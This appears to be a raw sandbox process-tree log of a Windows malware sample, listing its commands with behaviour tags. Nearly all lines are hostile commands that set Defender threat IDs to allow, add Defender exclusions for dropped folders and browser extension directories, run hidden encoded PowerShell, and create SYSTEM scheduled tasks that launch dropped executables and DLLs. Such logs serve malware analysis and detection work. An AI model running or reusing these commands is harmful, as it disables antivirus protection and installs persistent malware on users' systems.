C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3472
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3640
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CsUgOGApU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CsUgOGApU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VQnigEewLHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VQnigEewLHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YXRVthYkCAsAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YXRVthYkCAsAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eBaLNwdfBoAU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eBaLNwdfBoAU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\feaAGXZTPHSTZufvckR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\feaAGXZTPHSTZufvckR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dHiLAKBZJoSzXVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dHiLAKBZJoSzXVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rlXICvrLwbHDFviC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rlXICvrLwbHDFviC\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:323⤵PID:4444
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:324⤵PID:4508
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:643⤵PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VQnigEewLHUn" /t REG_DWORD /d 0 /reg:323⤵PID:2544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VQnigEewLHUn" /t REG_DWORD /d 0 /reg:643⤵PID:4584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YXRVthYkCAsAC" /t REG_DWORD /d 0 /reg:323⤵PID:968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YXRVthYkCAsAC" /t REG_DWORD /d 0 /reg:643⤵PID:2060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eBaLNwdfBoAU2" /t REG_DWORD /d 0 /reg:323⤵PID:5028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eBaLNwdfBoAU2" /t REG_DWORD /d 0 /reg:643⤵PID:880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\feaAGXZTPHSTZufvckR" /t REG_DWORD /d 0 /reg:323⤵PID:792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\feaAGXZTPHSTZufvckR" /t REG_DWORD /d 0 /reg:643⤵PID:4672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dHiLAKBZJoSzXVVB /t REG_DWORD /d 0 /reg:323⤵PID:4920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dHiLAKBZJoSzXVVB /t REG_DWORD /d 0 /reg:643⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI /t REG_DWORD /d 0 /reg:323⤵PID:2356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI /t REG_DWORD /d 0 /reg:643⤵PID:2184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rlXICvrLwbHDFviC /t REG_DWORD /d 0 /reg:323⤵PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rlXICvrLwbHDFviC /t REG_DWORD /d 0 /reg:643⤵PID:1148
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggODmgFIS" /SC once /ST 08:53:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggODmgFIS"2⤵PID:3332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggODmgFIS"2⤵PID:4464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TVsECgUtwDhLZifMW" /SC once /ST 16:37:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\VjCJSwY.exe\" I3 /Elsite_idHTW 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TVsECgUtwDhLZifMW"2⤵PID:228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4988
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2620
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4800
-
C:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\VjCJSwY.exeC:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\VjCJSwY.exe I3 /Elsite_idHTW 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1220 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bHNJINcAmGBfsLXkXG"2⤵PID:1132
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:3580
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2056
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:2112
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CsUgOGApU\VFffmv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jHYEWeDFllXYdol" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jHYEWeDFllXYdol2" /F /xml "C:\Program Files (x86)\CsUgOGApU\uqzmkKT.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jHYEWeDFllXYdol"2⤵PID:3340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jHYEWeDFllXYdol"2⤵PID:3824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "opRoyIfSGoYQul" /F /xml "C:\Program Files (x86)\eBaLNwdfBoAU2\GxuKWDa.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3192
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ipVEcCYbpTyEb2" /F /xml "C:\ProgramData\dHiLAKBZJoSzXVVB\JVKkhyy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NdTWWpscfLExPZKYg2" /F /xml "C:\Program Files (x86)\feaAGXZTPHSTZufvckR\xaJgLJV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "auFylssPRYUhOjCZxxH2" /F /xml "C:\Program Files (x86)\YXRVthYkCAsAC\wKITMtl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IypqguOSOyxhMfXuI" /SC once /ST 15:14:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rlXICvrLwbHDFviC\UgGWSnfj\lLUcjJN.dll\",#1 /kYsite_iddet 385118" /V1 /F2⤵
- Creates scheduled task(s)
PID:4200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "IypqguOSOyxhMfXuI"2⤵PID:3844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TVsECgUtwDhLZifMW"2⤵PID:1068
-
-
